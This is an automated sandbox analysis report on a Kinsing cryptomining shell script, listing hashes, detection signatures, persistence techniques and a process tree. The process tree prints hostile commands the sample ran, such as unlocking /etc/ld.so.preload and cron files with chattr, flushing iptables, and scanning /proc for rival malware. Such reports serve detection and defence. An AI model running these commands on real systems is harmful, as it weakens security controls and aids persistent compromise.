Analysis
-
max time kernel
120s -
max time network
84s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
23/02/2025, 18:48
Static task
static1
Behavioral task
behavioral1
Sample
mi.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
mi.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
mi.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
mi.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
mi.sh
-
Size
15KB
-
MD5
c9974199c64ca76d0bb11e3b22df32f4
-
SHA1
10dd09ae38ee8f63224da66aa610cc0b23be562a
-
SHA256
03e4f04531cb41a4a13e29255ff3e647697f9aaea9b0e83d21d62f354940c881
-
SHA512
14ab16109cd6569551d5359371cdfd1bdb42cfa52312daec2344852291113c78bd483d0e8e8c3a915078c0dcb8d93dd2ad7cc1d10efc4551de4539aee924ec3e
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwH:trgXux7YJDj8OoJwH
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral3/files/fstream-16.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral3/files/fstream-15.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload mi.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1741 chmod 1747 chmod 1748 chmod 1721 chmod 1723 chmod 1732 chmod 1734 chmod 1739 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1749 mi.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 750 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1469 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1548 xargs 1502 xargs 1507 xargs 1591 xargs 1651 sed 1710 xargs 1512 xargs 1633 sed 1638 xargs 1645 sed 1653 xargs 1656 xargs 1688 xargs 1623 xargs 1630 sed 1538 xargs 1478 uname 1517 xargs 1523 xargs 1528 xargs 1533 xargs 1555 xargs 1626 xargs 1573 xargs 1635 xargs 1636 sed 1650 xargs 1715 xargs 1543 xargs 747 chattr 1629 xargs 1639 sed 1654 sed 741 chattr 1567 xargs 1627 sed 1632 xargs 1648 sed 1579 xargs 1585 xargs 1624 sed 1560 xargs 1647 xargs 1676 xargs 1699 xargs 745 chattr 1641 xargs 1657 sed 1659 xargs 1671 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.VmGwHN crontab File opened for modification /var/spool/cron/crontabs/tmp.xIr5YI crontab File opened for modification /var/spool/cron/crontabs/tmp.7gu3Xd crontab File opened for modification /var/spool/cron/crontabs/tmp.77Tu6k crontab File opened for modification /var/spool/cron/crontabs/tmp.WOoLUS crontab File opened for modification /var/spool/cron/crontabs/tmp.MpP6mi crontab File opened for modification /var/spool/cron/crontabs/tmp.QDNy5b crontab File opened for modification /var/spool/cron/crontabs/tmp.K6V9LF crontab File opened for modification /var/spool/cron/crontabs/tmp.ANOlBh crontab File opened for modification /var/spool/cron/crontabs/tmp.cOm70J crontab File opened for modification /var/spool/cron/crontabs/tmp.FV1bzb crontab File opened for modification /var/spool/cron/crontabs/tmp.mPU16W crontab File opened for modification /var/spool/cron/crontabs/tmp.zmUkQv crontab File opened for modification /var/spool/cron/crontabs/tmp.4xwK0x crontab File opened for modification /var/spool/cron/crontabs/tmp.fEBe8O crontab File opened for modification /var/spool/cron/crontabs/tmp.TFtsnj crontab File opened for modification /var/spool/cron/crontabs/tmp.bugOJc crontab File opened for modification /var/spool/cron/crontabs/tmp.nXAP9e crontab File opened for modification /var/spool/cron/crontabs/tmp.oghxGR crontab File opened for modification /var/spool/cron/crontabs/tmp.Y1sDy7 crontab File opened for modification /var/spool/cron/crontabs/tmp.HgEcqy crontab File opened for modification /var/spool/cron/crontabs/tmp.bKKKvT crontab File opened for modification /var/spool/cron/crontabs/tmp.KCzwfH crontab File opened for modification /var/spool/cron/crontabs/tmp.xkBQWH crontab File opened for modification /var/spool/cron/crontabs/tmp.6nXnDI crontab File opened for modification /var/spool/cron/crontabs/tmp.VpOcCI crontab File opened for modification /var/spool/cron/crontabs/tmp.pEZcmG crontab File opened for modification /var/spool/cron/crontabs/tmp.vIzIuY crontab File opened for modification /var/spool/cron/crontabs/tmp.hwRUph crontab File opened for modification /var/spool/cron/crontabs/tmp.icAgXb crontab File opened for modification /var/spool/cron/crontabs/tmp.FGWBeT crontab File opened for modification /var/spool/cron/crontabs/tmp.jH51qx crontab File opened for modification /var/spool/cron/crontabs/tmp.Y4PYRM crontab File opened for modification /var/spool/cron/crontabs/tmp.cAudWx crontab File opened for modification /var/spool/cron/crontabs/tmp.abOUDC crontab File opened for modification /var/spool/cron/crontabs/tmp.XzQ5kz crontab File opened for modification /var/spool/cron/crontabs/tmp.TTKAQa crontab File opened for modification /var/spool/cron/crontabs/tmp.STs3I4 crontab File opened for modification /var/spool/cron/crontabs/tmp.VoWH9Z crontab File opened for modification /var/spool/cron/crontabs/tmp.18fK4L crontab File opened for modification /var/spool/cron/crontabs/tmp.7dJ1T6 crontab File opened for modification /var/spool/cron/crontabs/tmp.a450Mb crontab File opened for modification /var/spool/cron/crontabs/tmp.GmlnhP crontab File opened for modification /var/spool/cron/crontabs/tmp.h45ouJ crontab File opened for modification /var/spool/cron/crontabs/tmp.NRtKRp crontab File opened for modification /var/spool/cron/crontabs/tmp.eVRAMg crontab File opened for modification /var/spool/cron/crontabs/tmp.gjzRFA crontab File opened for modification /var/spool/cron/crontabs/tmp.jIe5NH crontab File opened for modification /var/spool/cron/crontabs/tmp.2f9nV6 crontab File opened for modification /var/spool/cron/crontabs/tmp.qa4cEk crontab File opened for modification /var/spool/cron/crontabs/tmp.EMKjik crontab File opened for modification /var/spool/cron/crontabs/tmp.05iogc crontab File opened for modification /var/spool/cron/crontabs/tmp.xElbcc crontab File opened for modification /var/spool/cron/crontabs/tmp.ZnPrQg crontab File opened for modification /var/spool/cron/crontabs/tmp.4msTzZ crontab File opened for modification /var/spool/cron/crontabs/tmp.fuO4L0 crontab File opened for modification /var/spool/cron/crontabs/tmp.GI4WT5 crontab File opened for modification /var/spool/cron/crontabs/tmp.xxMkON crontab File opened for modification /var/spool/cron/crontabs/tmp.Hyph4k crontab File opened for modification /var/spool/cron/crontabs/tmp.U8erVq crontab File opened for modification /var/spool/cron/crontabs/tmp.0qrw0a crontab File opened for modification /var/spool/cron/crontabs/tmp.u8cC0A crontab File opened for modification /var/spool/cron/crontabs/tmp.ZDTfRf crontab File opened for modification /var/spool/cron/crontabs/tmp.QqFYyG crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service mi.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1539 ps 1544 ps 1556 ps 1667 ps 1519 ps 1534 ps 1551 ps 1619 ps 1672 ps 1711 ps 1524 ps 1529 ps -
description ioc Process File opened for reading /proc/74/status pkill File opened for reading /proc/11/cmdline ps File opened for reading /proc/16/stat ps File opened for reading /proc/674/stat ps File opened for reading /proc/3/cmdline pkill File opened for reading /proc/2/stat ps File opened for reading /proc/20/status ps File opened for reading /proc/filesystems sed File opened for reading /proc/153/status pkill File opened for reading /proc/5/stat ps File opened for reading /proc/332/stat ps File opened for reading /proc/20/cmdline pkill File opened for reading /proc/self/maps awk File opened for reading /proc/332/status pkill File opened for reading /proc/255/cmdline pkill File opened for reading /proc/82/status pkill File opened for reading /proc/364/status pkill File opened for reading /proc/73/status pkill File opened for reading /proc/14/status ps File opened for reading /proc/733/cmdline pkill File opened for reading /proc/75/status ps File opened for reading /proc/384/cmdline ps File opened for reading /proc/self/stat ps File opened for reading /proc/364/status pkill File opened for reading /proc/9/cmdline ps File opened for reading /proc/175/status pkill File opened for reading /proc/14/cmdline pkill File opened for reading /proc/15/status pkill File opened for reading /proc/1520/stat ps File opened for reading /proc/11/cmdline pkill File opened for reading /proc/22/cmdline pkill File opened for reading /proc/22/status pkill File opened for reading /proc/680/stat ps File opened for reading /proc/733/stat ps File opened for reading /proc/420/stat ps File opened for reading /proc/18/status pkill File opened for reading /proc/110/status pkill File opened for reading /proc/9/cmdline pkill File opened for reading /proc/19/stat ps File opened for reading /proc/7/status pkill File opened for reading /proc/236/status pkill File opened for reading /proc/677/cmdline pkill File opened for reading /proc/37/cmdline pkill File opened for reading /proc/filesystems sed File opened for reading /proc/680/cmdline pkill File opened for reading /proc/364/cmdline ps File opened for reading /proc/364/cmdline pkill File opened for reading /proc/1/status ps File opened for reading /proc/75/cmdline ps File opened for reading /proc/680/status pkill File opened for reading /proc/16/cmdline pkill File opened for reading /proc/360/cmdline pkill File opened for reading /proc/69/cmdline pkill File opened for reading /proc/70/cmdline pkill File opened for reading /proc/21/status ps File opened for reading /proc/126/status pkill File opened for reading /proc/36/status pkill File opened for reading /proc/1660/cmdline pkill File opened for reading /proc/3/cmdline pkill File opened for reading /proc/153/cmdline pkill File opened for reading /proc/6/stat ps File opened for reading /proc/filesystems pkill File opened for reading /proc/81/status pkill File opened for reading /proc/69/cmdline pkill -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1424 ls 1854 sed
Processes
-
/tmp/mi.sh/tmp/mi.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:734 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:741
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:743
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:745
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:747
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:750
-
-
/bin/lsls -latrh /proc/12⤵PID:758
-
-
/bin/grepgrep exe2⤵PID:759
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:764
-
-
/bin/grepgrep exe2⤵PID:769
-
-
/bin/lsls -latrh /proc/102⤵PID:768
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:772
-
-
/bin/grepgrep exe2⤵PID:775
-
-
/bin/lsls -latrh /proc/112⤵PID:774
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:778
-
-
/bin/grepgrep exe2⤵PID:782
-
-
/bin/lsls -latrh /proc/1102⤵PID:781
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:785
-
-
/bin/grepgrep exe2⤵PID:789
-
-
/bin/lsls -latrh /proc/122⤵PID:788
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:792
-
-
/bin/grepgrep exe2⤵PID:796
-
-
/bin/lsls -latrh /proc/1262⤵PID:795
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:798
-
-
/bin/grepgrep exe2⤵PID:801
-
-
/bin/lsls -latrh /proc/1272⤵PID:800
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:803
-
-
/bin/grepgrep exe2⤵PID:807
-
-
/bin/lsls -latrh /proc/132⤵PID:806
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:809
-
-
/bin/grepgrep exe2⤵PID:812
-
-
/bin/lsls -latrh /proc/142⤵PID:811
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:814
-
-
/bin/grepgrep exe2⤵PID:817
-
-
/bin/lsls -latrh /proc/152⤵PID:816
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:819
-
-
/bin/grepgrep exe2⤵PID:822
-
-
/bin/lsls -latrh /proc/1532⤵PID:821
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:824
-
-
/bin/lsls -latrh /proc/162⤵PID:826
-
-
/bin/grepgrep exe2⤵PID:827
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:829
-
-
/bin/grepgrep exe2⤵PID:832
-
-
/bin/lsls -latrh /proc/1612⤵PID:831
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:834
-
-
/bin/lsls -latrh /proc/172⤵PID:836
-
-
/bin/grepgrep exe2⤵PID:837
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:839
-
-
/bin/grepgrep exe2⤵PID:842
-
-
/bin/lsls -latrh /proc/1752⤵PID:841
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:844
-
-
/bin/grepgrep exe2⤵PID:847
-
-
/bin/lsls -latrh /proc/182⤵PID:846
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:849
-
-
/bin/grepgrep exe2⤵PID:852
-
-
/bin/lsls -latrh /proc/192⤵PID:851
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:854
-
-
/bin/grepgrep exe2⤵PID:857
-
-
/bin/lsls -latrh /proc/22⤵PID:856
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:859
-
-
/bin/grepgrep exe2⤵PID:862
-
-
/bin/lsls -latrh /proc/202⤵PID:861
-
-
